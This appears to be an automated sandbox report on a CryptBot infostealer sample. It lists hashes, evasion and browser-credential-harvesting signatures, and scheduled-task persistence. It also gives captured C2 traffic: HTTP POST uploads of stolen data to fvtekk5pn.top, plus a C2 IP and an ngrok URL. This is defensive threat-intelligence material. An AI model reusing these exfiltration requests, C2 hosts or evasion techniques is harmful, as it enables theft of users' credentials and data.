Windows Analysis Report
file.exe

Overview

General Information

Sample name: file.exe
Analysis ID: 1561480
MD5: 8009fa9b3f6b5b95575a83c2f487f515
SHA1: df618866e5939f420342d3fe1007f4bad31ce2aa
SHA256: 72f200b10e86e1a4c4f1472fca830fa83bb45115ac60a17a70617863367fa9bf
Tags: exe, user-Bitsight

Detection

Clipboard Hijacker, Cryptbot
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Antivirus / Scanner detection for submitted sample
Attempt to bypass Chrome Application-Bound Encryption
Multi AV Scanner detection for dropped file
Multi AV Scanner detection for submitted file
Suricata IDS alerts for network traffic
Yara detected Clipboard Hijacker
Yara detected Cryptbot
AI detected suspicious sample
Drops large PE files
Found evasive API chain (may stop execution after checking mutex)
Found stalling execution ending in API Sleep call
Hides threads from debuggers
Machine Learning detection for sample
PE file contains section with special chars
Sigma detected: Suspicious Scheduled Task Creation Involving Temp Folder
Tries to detect process monitoring tools (Task Manager, Process Explorer etc.)
Tries to detect sandboxes / dynamic malware analysis system (registry check)
Tries to detect sandboxes and other dynamic analysis tools (window names)
Tries to detect virtualization through RDTSC time measurements
Tries to evade debugger and weak emulator (self modifying code)
Tries to harvest and steal browser information (history, passwords, etc)
Uses schtasks.exe or at.exe to add and modify task schedules
AV process strings found (often used to terminate AV products)
Abnormal high CPU Usage
Checks for debuggers (devices)
Checks if the current process is being debugged
Contains capabilities to detect virtual machines
Contains functionality for read data from the clipboard
Contains functionality to dynamically determine API calls
Contains functionality to modify clipboard data
Contains functionality to query CPU information (cpuid)
Contains functionality to read the clipboard data
Detected potential crypto function
Dropped file seen in connection with other malware
Drops PE files
Entry point lies outside standard sections
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found inlined nop instructions (likely shell or obfuscated code)
Found large amount of non-executed APIs
Found potential string decryption / allocating functions
HTTP GET or POST without a user agent
IP address seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
One or more processes crash
PE file contains an invalid checksum
PE file contains sections with non-standard names
Queries information about the installed CPU (vendor, model number etc)
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sigma detected: Browser Started with Remote Debugging
Sigma detected: Suspicious Schtasks From Env Var Folder
Uses 32bit PE files
Uses Microsoft's Enhanced Cryptographic Provider
Uses code obfuscation techniques (call, push, ret)

Classification

Name Description Attribution Blogpost URLs Link
CryptBot A typical infostealer, capable of obtaining credentials for browsers, cryptocurrency wallets, browser cookies, and credit cards, and of creating screenshots of the infected system. All stolen data is bundled into a zip file that is uploaded to the C2. No Attribution https://malpedia.caad.fkie.fraunhofer.de/details/win.cryptbot

AV Detection

Source: file.exe Avira: detected
Source: C:\Users\user\AppData\Local\Temp\service123.exe ReversingLabs: Detection: 45%
Source: file.exe ReversingLabs: Detection: 36%
Source: Submited Sample Integrated Neural Analysis Model: Matched 100.0% probability
Source: file.exe Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Local\Temp\service123.exe Code function: 8_2_006015B0 _open,_exit,_write,_close,CryptAcquireContextA,CryptGenRandom,CryptReleaseContext,CryptReleaseContext, 8_2_006015B0
Source: C:\Users\user\AppData\Local\Temp\service123.exe Code function: 8_2_6C0D14B0 _open,_exit,_write,_close,CryptAcquireContextA,CryptGenRandom,CryptReleaseContext,CryptReleaseContext, 8_2_6C0D14B0
Source: file.exe, 00000000.00000003.1693174364.00000000076A2000.00000004.00001000.00020000.00000000.sdmp Binary or memory string: -----BEGIN PUBLIC KEY----- memstr_7519ee52-3
Source: file.exe Static PE information: EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, DEBUG_STRIPPED
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Local\Mozilla\Firefox\Profiles\fqs92o4p.default-release\cache2\entries\
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Local\Mozilla\Firefox\
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Local\Mozilla\Firefox\Profiles\fqs92o4p.default-release\
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Local\Mozilla\Firefox\Profiles\fqs92o4p.default-release\cache2\
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Local\Mozilla\Firefox\Profiles\
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Local\Mozilla\Firefox\Profiles\fqs92o4p.default-release\cache2\doomed\
Source: C:\Users\user\AppData\Local\Temp\service123.exe Code function: 4x nop then lea ecx, dword ptr [esp+04h] 8_2_006081E0
Source: C:\Users\user\AppData\Local\Temp\service123.exe Code function: 4x nop then sub esp, 1Ch 8_2_6C14AEC0
Source: C:\Users\user\AppData\Local\Temp\service123.exe Code function: 4x nop then sub esp, 1Ch 8_2_6C14AF70
Source: C:\Users\user\AppData\Local\Temp\service123.exe Code function: 4x nop then push esi 8_2_6C0F0860
Source: C:\Users\user\AppData\Local\Temp\service123.exe Code function: 4x nop then mov eax, dword ptr [ecx+08h] 8_2_6C0FA970
Source: C:\Users\user\AppData\Local\Temp\service123.exe Code function: 4x nop then push esi 8_2_6C0FA9E0
Source: C:\Users\user\AppData\Local\Temp\service123.exe Code function: 4x nop then mov eax, dword ptr [ecx+08h] 8_2_6C0FA9E0
Source: C:\Users\user\AppData\Local\Temp\service123.exe Code function: 4x nop then mov eax, 6C1AF960h 8_2_6C0EEB10
Source: C:\Users\user\AppData\Local\Temp\service123.exe Code function: 4x nop then sub esp, 1Ch 8_2_6C0F4453
Source: C:\Users\user\AppData\Local\Temp\service123.exe Code function: 4x nop then push ebx 8_2_6C1784A0
Source: C:\Users\user\AppData\Local\Temp\service123.exe Code function: 4x nop then mov eax, dword ptr [ecx] 8_2_6C0FC510
Source: C:\Users\user\AppData\Local\Temp\service123.exe Code function: 4x nop then mov eax, dword ptr [ecx+08h] 8_2_6C0FA580
Source: C:\Users\user\AppData\Local\Temp\service123.exe Code function: 4x nop then push esi 8_2_6C0FA5F0
Source: C:\Users\user\AppData\Local\Temp\service123.exe Code function: 4x nop then mov eax, dword ptr [ecx+08h] 8_2_6C0FA5F0
Source: C:\Users\user\AppData\Local\Temp\service123.exe Code function: 4x nop then push esi 8_2_6C0FE6E0
Source: C:\Users\user\AppData\Local\Temp\service123.exe Code function: 4x nop then mov eax, dword ptr [ecx] 8_2_6C0FE6E0
Source: C:\Users\user\AppData\Local\Temp\service123.exe Code function: 4x nop then mov eax, ecx 8_2_6C170730
Source: C:\Users\user\AppData\Local\Temp\service123.exe Code function: 4x nop then mov eax, dword ptr [ecx] 8_2_6C0F0740
Source: C:\Users\user\AppData\Local\Temp\service123.exe Code function: 4x nop then sub esp, 1Ch 8_2_6C14C040
Source: C:\Users\user\AppData\Local\Temp\service123.exe Code function: 4x nop then sub esp, 1Ch 8_2_6C14C1A0
Source: C:\Users\user\AppData\Local\Temp\service123.exe Code function: 4x nop then mov eax, dword ptr [ecx+04h] 8_2_6C12A1E0
Source: C:\Users\user\AppData\Local\Temp\service123.exe Code function: 4x nop then mov eax, dword ptr [ecx] 8_2_6C0F0260
Source: C:\Users\user\AppData\Local\Temp\service123.exe Code function: 4x nop then mov eax, dword ptr [6C1AD014h] 8_2_6C1A4360
Source: C:\Users\user\AppData\Local\Temp\service123.exe Code function: 4x nop then sub esp, 1Ch 8_2_6C14BD10
Source: C:\Users\user\AppData\Local\Temp\service123.exe Code function: 4x nop then push esi 8_2_6C147D10
Source: C:\Users\user\AppData\Local\Temp\service123.exe Code function: 4x nop then push edi 8_2_6C143840
Source: C:\Users\user\AppData\Local\Temp\service123.exe Code function: 4x nop then lea eax, dword ptr [ecx+04h] 8_2_6C0FD974
Source: C:\Users\user\AppData\Local\Temp\service123.exe Code function: 4x nop then push ebp 8_2_6C10BBD7
Source: C:\Users\user\AppData\Local\Temp\service123.exe Code function: 4x nop then push ebp 8_2_6C10BBDB
Source: C:\Users\user\AppData\Local\Temp\service123.exe Code function: 4x nop then sub esp, 1Ch 8_2_6C14B4D0
Source: C:\Users\user\AppData\Local\Temp\service123.exe Code function: 4x nop then push ebp 8_2_6C0FD504
Source: C:\Users\user\AppData\Local\Temp\service123.exe Code function: 4x nop then mov eax, dword ptr [esp+04h] 8_2_6C149600
Source: C:\Users\user\AppData\Local\Temp\service123.exe Code function: 4x nop then lea eax, dword ptr [ecx+0Ch] 8_2_6C0FD674
Source: C:\Users\user\AppData\Local\Temp\service123.exe Code function: 4x nop then mov eax, 6C1ADFF4h 8_2_6C143690
Source: C:\Users\user\AppData\Local\Temp\service123.exe Code function: 4x nop then lea eax, dword ptr [ecx+08h] 8_2_6C0FD7F4
Source: C:\Users\user\AppData\Local\Temp\service123.exe Code function: 4x nop then push edi 8_2_6C173140
Source: C:\Users\user\AppData\Local\Temp\service123.exe Code function: 4x nop then sub esp, 1Ch 8_2_6C0EB1D0
Source: C:\Users\user\AppData\Local\Temp\service123.exe Code function: 4x nop then sub esp, 1Ch 8_2_6C0FD2A0
Source: C:\Users\user\AppData\Local\Temp\service123.exe Code function: 4x nop then push ebx 8_2_6C167350
Source: chrome.exe Memory has grown: Private usage: 14MB later: 25MB

Networking

Source: Network traffic Suricata IDS: 2054350 - Severity 1 - ET MALWARE Win32/Cryptbotv2 CnC Activity (POST) M4 : 192.168.2.4:49737 -> 34.116.198.130:80
Source: Network traffic Suricata IDS: 2054350 - Severity 1 - ET MALWARE Win32/Cryptbotv2 CnC Activity (POST) M4 : 192.168.2.4:49749 -> 34.116.198.130:80
Source: Network traffic Suricata IDS: 2054350 - Severity 1 - ET MALWARE Win32/Cryptbotv2 CnC Activity (POST) M4 : 192.168.2.4:49738 -> 34.116.198.130:80
Source: global traffic HTTP traffic detected: GET /LCXOUUtXgrKhKDLYSbzW1732019347 HTTP/1.1 Host: home.fvtekk5pn.top Accept: */*
Source: global traffic HTTP traffic detected: POST /v1/upload.php HTTP/1.1 Host: fvtekk5pn.top Accept: */* Content-Length: 459 Content-Type: multipart/form-data; boundary=------------------------ONK2fRoVUIiQdRQ0OJoamy Data Ascii: --------------------------ONK2fRoVUIiQdRQ0OJoamy Content-Disposition: form-data; name="file"; filename="Fajiwom.bin" Content-Type: application/octet-stream
Source: global traffic HTTP traffic detected: POST /v1/upload.php HTTP/1.1 Host: fvtekk5pn.top Accept: */* Content-Length: 75887 Content-Type: multipart/form-data; boundary=------------------------bBx6IZDHm36jJEFSEEpcZD
Source: global traffic HTTP traffic detected: POST /v1/upload.php HTTP/1.1 Host: fvtekk5pn.top Accept: */* Content-Length: 30018 Content-Type: multipart/form-data; boundary=------------------------78mgyYfZCNsJ07Hf5bxVqu
Source: Joe Sandbox View IP Address: 239.255.255.250 239.255.255.250
Source: Joe Sandbox View IP Address: 34.116.198.130 34.116.198.130
Source: unknown UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: chrome.exe, 00000004.00000002.2040946827.00001814006D1000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: %https://www.youtube.com/?feature=ytca equals www.youtube.com (Youtube)
Source: chrome.exe, 00000004.00000002.2040946827.00001814006D1000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: @https://www.youtube.com/s/notifications/manifest/cr_install.html equals www.youtube.com (Youtube)
Source: chrome.exe, 00000004.00000002.2040946827.00001814006D1000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.youtube.com/: equals www.youtube.com (Youtube)
Source: chrome.exe, 00000004.00000002.2040946827.00001814006D1000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.youtube.com/J equals www.youtube.com (Youtube)
Source: chrome.exe, 00000004.00000002.2039193463.00001814002D0000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.youtube.com/s/notifications/manifest/cr_install.html equals www.youtube.com (Youtube)
Source: global traffic DNS traffic detected: DNS query: home.fvtekk5pn.top
Source: global traffic DNS traffic detected: DNS query: fvtekk5pn.top
Source: global traffic DNS traffic detected: DNS query: www.google.com
Source: unknown HTTP traffic detected: POST /v1/upload.php HTTP/1.1 Host: fvtekk5pn.top Accept: */* Content-Length: 459 Content-Type: multipart/form-data; boundary=------------------------ONK2fRoVUIiQdRQ0OJoamy Data Ascii: --------------------------ONK2fRoVUIiQdRQ0OJoamy Content-Disposition: form-data; name="file"; filename="Fajiwom.bin" Content-Type: application/octet-stream
Source: file.exe, 00000000.00000003.1693174364.00000000076A2000.00000004.00001000.00020000.00000000.sdmp String found in binary or memory: http://.css
Source: file.exe, 00000000.00000003.1693174364.00000000076A2000.00000004.00001000.00020000.00000000.sdmp String found in binary or memory: http://.jpg
Source: chrome.exe, 00000004.00000002.2040100309.00001814004B8000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://accounts.google.com/GetCheckConnectionInfo?source=ChromiumBrowser
Source: chrome.exe, 00000004.00000002.2039922272.0000181400424000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000004.00000002.2042740755.0000181400A84000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000004.00000002.2038217453.000018140008C000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://accounts.google.com/ListAccounts?gpsia=1&source=ChromiumBrowser&json=standard
Source: chrome.exe, 00000004.00000002.2038976352.000018140020C000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://accounts.google.com/ListAccounts?json=standard
Source: chrome.exe, 00000004.00000002.2038902736.00001814001C4000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://accounts.google.com/Logout
Source: chrome.exe, 00000004.00000002.2038902736.00001814001C4000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://accounts.google.com/Logout1
Source: chrome.exe, 00000004.00000002.2040100309.00001814004B8000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://accounts.google.com/Logout?source=ChromiumBrowser&continue=https://accounts.google.com/chrom
Source: chrome.exe, 00000004.00000002.2038902736.00001814001C4000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://accounts.google.com/MergeSession
Source: chrome.exe, 00000004.00000002.2038902736.00001814001C4000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://accounts.google.com/MergeSession-
Source: chrome.exe, 00000004.00000002.2038902736.00001814001C4000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://accounts.google.com/OAuthLogin
Source: chrome.exe, 00000004.00000002.2042559516.0000181400A0C000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://accounts.google.com/OAuthLogin?source=ChromiumBrowser&issueuberauth=1
Source: chrome.exe, 00000004.00000002.2038976352.000018140020C000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://accounts.google.com/RotateBoundCookies
Source: chrome.exe, 00000004.00000002.2038976352.000018140020C000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://accounts.google.com/chrome/blank.html
Source: chrome.exe, 00000004.00000002.2038976352.000018140020C000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://accounts.google.com/chrome/blank.htmlB
Source: chrome.exe, 00000004.00000002.2038976352.000018140020C000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://accounts.google.com/embedded/reauth/chromeos
Source: chrome.exe, 00000004.00000002.2038311397.00001814000A8000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://accounts.google.com/embedded/setup/chrome/usermenu
Source: chrome.exe, 00000004.00000002.2038311397.00001814000A8000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://accounts.google.com/embedded/setup/kidsignin/chromeos
Source: chrome.exe, 00000004.00000002.2038311397.00001814000A8000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://accounts.google.com/embedded/setup/kidsignup/chromeos
Source: chrome.exe, 00000004.00000002.2038976352.000018140020C000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://accounts.google.com/embedded/setup/v2/chromeos
Source: chrome.exe, 00000004.00000002.2038976352.000018140020C000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://accounts.google.com/embedded/setup/windows
Source: chrome.exe, 00000004.00000002.2038976352.000018140020C000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://accounts.google.com/embedded/xreauth/chrome
Source: chrome.exe, 00000004.00000002.2038976352.000018140020C000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://accounts.google.com/encryption/unlock/desktop
Source: chrome.exe, 00000004.00000002.2038217453.000018140008C000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://accounts.google.com/encryption/unlock/desktop?kdi=CAIaDgoKY2hyb21lc3luYxAB
Source: chrome.exe, 00000004.00000002.2038902736.00001814001C4000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://accounts.google.com/o/oauth2/revoke
Source: chrome.exe, 00000004.00000002.2038976352.000018140020C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000004.00000002.2044313342.0000181400C68000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://accounts.google.com/oauth/multilogin
Source: chrome.exe, 00000004.00000002.2038976352.000018140020C000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://accounts.google.com/signin/chrome/sync?ssp=1
Source: chrome.exe, 00000004.00000002.2038902736.00001814001C4000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://accounts.google.com:443
Source: file.exe, 00000000.00000003.1693174364.00000000076A2000.00000004.00001000.00020000.00000000.sdmp String found in binary or memory: https://ace-snapper-privately.ngrok-free.app/test/test
Source: file.exe, 00000000.00000003.1693174364.00000000076A2000.00000004.00001000.00020000.00000000.sdmp String found in binary or memory: https://ace-snapper-privately.ngrok-free.app/test/testFailed
Source: chrome.exe, 00000004.00000003.2027416578.000018140037C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000004.00000003.2027900315.0000181400824000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000004.00000002.2043917021.0000181400C0C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000004.00000003.2027874058.000018140037C000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://anglebug.com/4830
Source: chrome.exe, 00000004.00000003.2027416578.000018140037C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000004.00000003.2027900315.0000181400824000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000004.00000002.2043917021.0000181400C0C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000004.00000003.2027874058.000018140037C000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://anglebug.com/4966
Source: chrome.exe, 00000004.00000003.2027416578.000018140037C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000004.00000003.2027900315.0000181400824000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000004.00000002.2043917021.0000181400C0C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000004.00000003.2027874058.000018140037C000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://anglebug.com/5845
Source: chrome.exe, 00000004.00000003.2027416578.000018140037C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000004.00000003.2027900315.0000181400824000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000004.00000002.2043917021.0000181400C0C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000004.00000003.2027874058.000018140037C000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://anglebug.com/6574
Source: chrome.exe, 00000004.00000003.2027416578.000018140037C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000004.00000003.2027900315.0000181400824000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000004.00000002.2043917021.0000181400C0C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000004.00000003.2027874058.000018140037C000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://anglebug.com/7161
Source: chrome.exe, 00000004.00000003.2027416578.000018140037C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000004.00000003.2027900315.0000181400824000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000004.00000002.2043917021.0000181400C0C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000004.00000003.2027874058.000018140037C000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://anglebug.com/7162
Source: chrome.exe, 00000004.00000003.2027416578.000018140037C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000004.00000003.2027900315.0000181400824000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000004.00000002.2039956806.0000181400444000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000004.00000003.2027874058.000018140037C000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://anglebug.com/7246
Source: chrome.exe, 00000004.00000003.2027416578.000018140037C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000004.00000003.2027900315.0000181400824000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000004.00000002.2043917021.0000181400C0C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000004.00000003.2027874058.000018140037C000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://anglebug.com/7308
Source: chrome.exe, 00000004.00000003.2027416578.000018140037C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000004.00000003.2027900315.0000181400824000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000004.00000002.2043917021.0000181400C0C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000004.00000003.2027874058.000018140037C000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://anglebug.com/7319
Source: chrome.exe, 00000004.00000003.2027416578.000018140037C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000004.00000003.2027900315.0000181400824000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000004.00000002.2043917021.0000181400C0C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000004.00000003.2027874058.000018140037C000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://anglebug.com/7320
Source: chrome.exe, 00000004.00000003.2027416578.000018140037C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000004.00000003.2027900315.0000181400824000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000004.00000002.2043917021.0000181400C0C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000004.00000003.2027874058.000018140037C000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://anglebug.com/7369
Source: chrome.exe, 00000004.00000003.2027416578.000018140037C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000004.00000003.2027900315.0000181400824000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000004.00000002.2043917021.0000181400C0C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000004.00000003.2027874058.000018140037C000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://anglebug.com/7382
Source: chrome.exe, 00000004.00000003.2027416578.000018140037C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000004.00000003.2027900315.0000181400824000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000004.00000002.2043917021.0000181400C0C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000004.00000003.2027874058.000018140037C000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://anglebug.com/7489
Source: chrome.exe, 00000004.00000003.2027416578.000018140037C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000004.00000003.2027900315.0000181400824000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000004.00000002.2043917021.0000181400C0C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000004.00000003.2027874058.000018140037C000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://anglebug.com/7604
Source: chrome.exe, 00000004.00000003.2027416578.000018140037C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000004.00000003.2027900315.0000181400824000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000004.00000002.2043917021.0000181400C0C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000004.00000003.2027874058.000018140037C000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://anglebug.com/7714
Source: chrome.exe, 00000004.00000003.2027416578.000018140037C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000004.00000003.2027900315.0000181400824000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000004.00000002.2043917021.0000181400C0C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000004.00000003.2027874058.000018140037C000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://anglebug.com/7847
Source: chrome.exe, 00000004.00000003.2027416578.000018140037C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000004.00000003.2027900315.0000181400824000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000004.00000002.2043917021.0000181400C0C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000004.00000003.2027874058.000018140037C000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://anglebug.com/7899
Source: chrome.exe, 00000004.00000002.2041167199.0000181400728000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000004.00000002.2040205160.00001814004EC000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://calendar.google.com/calendar/u/0/r/eventedit?usp=chrome_actions
Source: chrome.exe, 00000004.00000002.2043917021.0000181400C0C000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://cdn.ecosia.org/assets/images/ico/favicon.ico
Source: chrome.exe, 00000004.00000002.2044313342.0000181400C68000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://ch.search.yahoo.com/favicon.ico
Source: chrome.exe, 00000004.00000002.2044313342.0000181400C68000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://ch.search.yahoo.com/favicon.icofrom_play_api
Source: chrome.exe, 00000004.00000002.2044313342.0000181400C68000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://ch.search.yahoo.com/search
Source: chrome.exe, 00000004.00000002.2044313342.0000181400C68000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://ch.search.yahoo.com/search?ei=&fr=crmas&p=
Source: chrome.exe, 00000004.00000002.2044313342.0000181400C68000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://ch.search.yahoo.com/search?ei=&fr=crmas&p=searchTerms
Source: chrome.exe, 00000004.00000002.2041847282.00001814008CC000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=
Source: chrome.exe, 00000004.00000003.2030046781.0000181400CF8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000004.00000002.2040599115.000018140060C000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://chrome.google.com/webstore
Source: chrome.exe, 00000004.00000002.2040599115.000018140060C000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://chrome.google.com/webstore206E5
Source: chrome.exe, 00000004.00000002.2041505353.00001814007F4000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000004.00000002.2038029637.000018140001C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000004.00000002.2042697650.0000181400A50000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000004.00000002.2042394055.00001814009A0000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://chrome.google.com/webstore?hl=en
Source: chrome.exe, 00000004.00000003.2028451196.0000181400CF8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000004.00000003.2031624572.0000181400CF8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000004.00000002.2041812935.00001814008B4000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000004.00000003.2030567163.0000181400338000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000004.00000003.2028375406.0000181400CE0000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000004.00000003.2030709409.0000181400CF0000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000004.00000003.2029434831.0000181400CE0000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000004.00000003.2030046781.0000181400CF8000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://chrome.google.com/webstoreLDDiscover
Source: chrome.exe, 00000004.00000002.2038413779.00001814000F0000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://chrome.google.cou
Source: chrome.exe, 00000004.00000002.2052746491.00004D7C0078C000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://chromekanonymity-pa.googleapis.com/
Source: chrome.exe, 00000004.00000003.2008193375.00004D7C00390000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000004.00000003.2008508868.00004D7C0039C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000004.00000002.2052950679.00004D7C0080C000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://chromekanonymity-pa.googleapis.com/2%
Source: chrome.exe, 00000004.00000002.2052746491.00004D7C0078C000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://chromekanonymityauth-pa.googleapis.com/
Source: chrome.exe, 00000004.00000003.2008193375.00004D7C00390000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000004.00000003.2008508868.00004D7C0039C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000004.00000002.2052950679.00004D7C0080C000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://chromekanonymityauth-pa.googleapis.com/2$
